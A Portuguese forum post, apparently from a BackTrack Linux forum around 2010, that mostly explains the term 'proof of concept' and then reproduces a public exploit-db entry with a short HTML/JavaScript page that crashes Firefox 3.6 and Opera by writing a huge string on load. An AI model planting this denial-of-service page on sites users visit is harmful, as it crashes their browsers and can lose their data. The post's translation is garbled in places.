Results 1 to 1 of 1

Thread: Exploit força lançamento do Firefox 3.6.2

  1. #1
    Moderator firebits's Avatar
    Join Date
    Mar 2010
    Location
    Brazil
    Posts
    353

    Lightbulb Exploit força lançamento do Firefox 3.6.2

    Aproveitando o gancho da notícia Vulnerabilidade força lançamento do Firefox 3.6.2, temos aqui o exploit como "Prova de Conceito" ou "Proof of Concept".

    Prova de conceito é uma pequena e/ou realização incompleta, sinopse de um determinado método ou uma idéia(s) para demonstrar a sua viabilidade, ou uma demonstração em princípio, cuja finalidade é verificar se algum conceito ou teoria é, provavelmente, capaz de ser útil. A conexas (algo sinônimo) o termo é "prova do princípio".

    A prova de conceito é geralmente considerada um marco no caminho para um protótipo totalmente funcional.

    Em segurança de computadores o termo prova de conceito (código de verificação de conceito ou PoC) é freqüentemente usado como sinônimo de um exploit zero-day que, principalmente para a sua criação inicial, não aproveitar mais alguma vulnerabilidade.

    Origem da frase

    O Dicionário Inglês Oxford tem um exemplo do uso da frase, já em 22 de janeiro de 1967, no jornal Los Angeles Times.

    Um dos primeiros usos do termo "prova de conceito", foi feito por Bruce Carsten no contexto de uma "prova de conceito do protótipo".

    Prova de Conceito é um termo que (eu acredito) foi cunhado em 1984. Foi utilizado para designar um circuito construído ao longo de linhas semelhantes para um protótipo de engenharia, mas em que a intenção era apenas demonstrar a viabilidade de um novo circuito e/ou uma técnica de fabricação e não se destinava a ser uma versão preliminar de um desenho de produção.

    Em segurança

    Em ambos, segurança e criptografia de computadores, prova de conceito refere-se a uma demonstração de que, em princípio, um sistema pode ser protegido ou comprometido, sem a necessidade de construção de uma forma completa e funcional para o efeito. Winzapper foi uma prova de conceito que possuía o mínimo de recursos necessários para seletivamente remover um item de segurança do Log Windows, mas não foi otimizado de forma alguma.

    Na investigação e desenvolvimento

    No domínio da investigação aplicada, as pessoas trabalham em um projeto ou proposta. Muitas vezes comprometem-se em fazer uma investigação interna, inicialmente, para verificar se as idéias centrais são funcionais e viáveis, antes de ir mais longe. Isso às vezes inclui testes de desempenho limitados. O uso de prova de conceito pode ajuda a determinar a viabilidade, questões técnicas e direção geral, bem como fornecer feedback sobre orçamento e outras formas de discussão nas esferas comercial e de controle. Ela não está relacionada a uma prova científica.

    Em vendas e desenvolvimento de negócios

    Na área de desenvolvimento de negócios e vendas, um vendedor pode permitir que um cliente tenha perspectiva de avaliação para o produto de software. O uso de prova de conceito ajuda a determinar a viabilidade, questões técnicas e direção geral, bem como fornecer feedback sobre orçamento e outras formas de processos de tomada de decisão interna.

    Em desenvolvimento de software (nosso foco em computação)

    No desenvolvimento de software, a prova de conceito (PoC) é muitas vezes indevidamente utilizada para descrever três processos com objetivos e funções diferentes. Os usos da prova de conceito, portanto, não são sinônimos e são delineadas.

    A prova de conceito pode se referir a uma solução parcial que envolve um número relativamente pequeno de usuários atuando em papéis de empresas para verificar se o sistema satisfaz alguns aspectos dos requisitos.

    Em contrapartida, o objetivo da prova de tecnologia é a de determinar a solução de algum problema técnico, por exemplo, como dois sistemas podem ser integrados ou que um certo throughput pode ser conseguido com uma determinada configuração. Os usuários empresariais precisam estar envolvidos em uma prova de tecnologia.

    Um projeto piloto refere-se a uma primeira implantação de um sistema em produção, visando um alcance limitado da solução do destino final. O alcance pode ser limitado pelo número de usuários que podem acessar o sistema, os processos de negócios que serão afetados, os parceiros de negócios envolvidos, ou outras restrições adequadas ao domínio. O propósito é ter um projeto-piloto para testar, muitas vezes em um ambiente de produção, se o sistema está funcionando como ele foi projetado, limitando a exposição do negócio.

    Esta foi a definição de Prova de Conceito.

    Agora vamos ao exploit contra o firefox 2.6.x, que você acha em: http://www.exploit- db.com/exploits/11617 # Title: Mozilla Firefox v3.6 and Opera Long String Crash(0day) Exploit
    # EDB-ID: 11617
    # CVE-ID: ()
    # OSVDB-ID: ()
    # Author: Asheesh kumar Mani Tripathi
    # Published: 2010-03-02
    # Verified: yes
    # Download Exploit Code
    # Download N/A

    ================================================== =====================
    Mozilla Firefox 3.6 plenitude String Crash(0day) Exploit
    Opera (plenitude String )Denial of Service Exploit
    ================================================== =====================

    by

    Asheesh Kumar Mani Tripathi


    # code by Asheesh kumar Mani Tripathi
    # email informationhacker08@gmail.com
    # company AKS IT Services
    # Credit by Asheesh Anaconda
    #Download Firefox web browser | Faster, more secure, & customizable

    #Background
    Mozilla Firefox is a popular internet browser. .....:)

    Português
    Mozilla Firefox é um popular browser de internet .....:)

    #Vulnerability
    This bug is a typical result when attacker try to write plenitude String in
    document.write() function .User interaction is required to
    exploit this vulnerability in that the target must visit a malicious
    web page.

    Vulnerabilidade:

    Este erro é um resultado típico atacante quando tenta escrever em plenitude String document.write () function. interação do usuário é obrigado a explorar esta vulnerabilidade em que a meta deve visitar um mal-intencionados página da web. Impacto: Mozilla trava :)


    Prova de conceito: copie o código para editor de arquivo de texto e salve como "asheesh.html" e feche todas as abas e janelas para evitar qualquer perda de dados aberto no Mozilla Firefox e aguarde 15 segundos ...... : Bye)

    asheesh.html:

    <html>
    <title>asheesh kumar mani tripathi</title>
    </br>Asheesh kumar Mani Tripathi
    <head>

    <script>
    function asheesh ()
    {
    var i=24 , anaconda = "XXXX"
    for(i=24; i>0; --i)
    {
    anaconda=anaconda+anaconda;
    }

    document.write(anaconda);
    }
    </script>
    </head>

    <body onLoad="asheesh()"></body>
    </html>

    Espero ter ajudado.

    Artigo Próprio por firebits
    http://www.backtrack-linux.org/forum.../firebits.html
    Last edited by firebits; 04-17-2010 at 04:30 PM.

Similar Threads

  1. Backtrack 4 - Fazendo Pentesting em WEP em 3 minutos -parte 1
    By firebits in forum Tutoriais e Howtos
    Replies: 1
    Last Post: 04-08-2010, 12:44 PM
  2. Exploit força lançamento do Firefox 3.6.2
    By firebits in forum Tutoriais e Howtos
    Replies: 0
    Last Post: 03-28-2010, 06:15 PM
  3. Replies: 0
    Last Post: 03-24-2010, 10:01 PM
  4. Non parte l'interfaccia grafica!!!
    By trupisalvo in forum Supporto Hardware
    Replies: 2
    Last Post: 03-09-2010, 04:20 PM
  5. Replies: 9
    Last Post: 07-26-2009, 10:42 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •